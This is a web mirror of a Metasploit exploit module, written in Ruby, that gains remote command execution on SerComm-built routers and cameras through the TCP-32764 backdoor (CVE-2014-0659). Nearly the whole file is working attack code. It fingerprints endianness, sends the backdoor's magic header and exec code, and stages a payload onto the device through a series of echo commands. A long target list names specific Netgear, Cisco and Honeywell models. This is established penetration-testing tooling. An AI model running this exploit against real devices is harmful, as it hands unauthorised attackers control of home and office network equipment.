Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/sercomm_exec.rb
24176 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "SerComm Device Remote Code Execution",

17
        'Description' => %q{

18
          This module will cause remote code execution on several SerComm devices.

19
          These devices typically include routers from NetGear and Linksys.

20
          This module was tested successfully against several NetGear, Honeywell

21
          and Cisco devices.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc

26
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module

27
        ],

28
        'Payload' => {

29
          'Space' => 10000, # Could be more, but this should be good enough

30
          'DisableNops' => true

31
        },

32
        'Platform' => 'linux',

33
        'Privileged' => false,

34
        'Targets' => [

35
          [

36
            'Generic Linux MIPS Big Endian',

37
            {

38
              'Arch' => ARCH_MIPSBE,

39
              'PackFormat' => 'VVV'

40
            }

41
          ],

42
          [

43
            'Generic Linux MIPS Little Endian',

44
            {

45
              'Arch' => ARCH_MIPSLE,

46
              'PackFormat' => 'NNN'

47
            }

48
          ],

49
          [

50
            'Manual Linux MIPS Big Endian',

51
            {

52
              'Arch' => ARCH_MIPSBE

53
            }

54
          ],

55
          [

56
            'Manual Linux MIPS Little Endian',

57
            {

58
              'Arch' => ARCH_MIPSLE

59
            }

60
          ],

61
          [

62
            'Cisco WAP4410N',

63
            {

64
              'Arch' => ARCH_MIPSBE,

65
              'PackFormat' => 'NNN',

66
            }

67
          ],

68
          [

69
            'Honeywell WAP-PL2 IP Camera',

70
            {

71
              'Arch' => ARCH_MIPSLE,

72
              'PackFormat' => 'VVV'

73
            }

74
          ],

75
          [

76
            'Netgear DG834',

77
            {

78
              'Arch' => ARCH_MIPSBE,

79
              'PackFormat' => 'VVV',

80
              'NoArgs' => true

81
            }

82
          ],

83
          [

84
            'Netgear DG834G',

85
            {

86
              'Arch' => ARCH_MIPSLE,

87
              'PackFormat' => 'VVV',

88
              'PayloadEncode' => 'octal'

89
            }

90
          ],

91
          [

92
            'Netgear DG834PN',

93
            {

94
              'Arch' => ARCH_MIPSBE,

95
              'PackFormat' => 'VVV',

96
              'NoArgs' => true

97
            }

98
          ],

99
          [

100
            'Netgear DGN1000',

101
            {

102
              'Arch' => ARCH_MIPSBE,

103
              'PackFormat' => 'VVV',

104
              'NoArgs' => true

105
            }

106
          ],

107
          [

108
            'Netgear DSG835',

109
            {

110
              'Arch' => ARCH_MIPSBE,

111
              'PackFormat' => 'VVV',

112
              'NoArgs' => true,

113
            }

114
          ],

115
          [

116
            'Netgear WPNT834',

117
            {

118
              'Arch' => ARCH_MIPSBE,

119
              'PackFormat' => 'NNN',

120
              'UploadPath' => '/var',

121
              'PayloadEncode' => 'octal'

122
            }

123
          ]

124
        ],

125
        'DefaultTarget' => 0,

126
        'References' => [

127
          [ 'CVE', '2014-0659' ],

128
          [ 'OSVDB', '101653' ],

129
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]

130
        ],

131
        'DisclosureDate' => '2013-12-31',

132
        'Notes' => {

133
          'Reliability' => UNKNOWN_RELIABILITY,

134
          'Stability' => UNKNOWN_STABILITY,

135
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

136
        }

137
      )

138
    )

139


140
    register_options(

141
      [

142
        Opt::RPORT(32764)

143
      ]

144
    )

145


146
    register_advanced_options(

147
      [

148
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),

149
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),

150
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),

151
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

152
      ]

153
    )

154
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

155
  end

156


157
  def check

158
    fprint = endian_fingerprint

159


160
    case fprint

161
    when 'BE'

162
      vprint_status("Detected Big Endian")

163
      return Msf::Exploit::CheckCode::Appears

164
    when 'LE'

165
      vprint_status("Detected Little Endian")

166
      return Msf::Exploit::CheckCode::Appears

167
    end

168


169
    return Msf::Exploit::CheckCode::Safe

170
  end

171


172
  def exploit

173
    if target.name =~ /Manual/

174
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")

175
      @no_args = datastore['NOARGS']

176
      @upload_path = datastore['UPLOADPATH']

177
      @encoding_format = datastore['ENCODING']

178
      @pack_format = datastore['PACKFORMAT']

179
    else

180
      @no_args = target['NoArgs']

181
      @upload_path = target['UploadPath']

182
      @encoding_format = target['PayloadEncode']

183
      @pack_format = target['PackFormat']

184
    end

185


186
    execute_cmdstager(

187
      :noargs => @no_args,

188
      :temp => @upload_path,

189
      :enc_format => @encoding_format,

190
      :flavor => :echo

191
    )

192
  end

193


194
  def endian_fingerprint

195
    begin

196
      connect

197


198
      sock.put(rand_text(5))

199
      res = sock.get_once

200


201
      disconnect

202


203
      if res && res.start_with?("MMcS")

204
        return 'BE'

205
      elsif res && res.start_with?("ScMM")

206
        return 'LE'

207
      end

208
    rescue Rex::ConnectionError => e

209
      print_error("Connection failed: #{e.class}: #{e}")

210
    end

211


212
    return nil

213
  end

214


215
  def execute_command(cmd, opts)

216
    # Get the length of the command, for the backdoor's command injection

217
    cmd_length = cmd.length

218


219
    # 0x53634d4d  => Backdoor code

220
    # 0x07        => Exec command

221
    # cmd_length  => Length of command to execute, sent after communication struct

222
    data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)

223


224
    connect

225
    # Send command structure followed by command text

226
    sock.put(data + cmd)

227
    disconnect

228


229
    Rex.sleep(1)

230
  end

231
end

232


233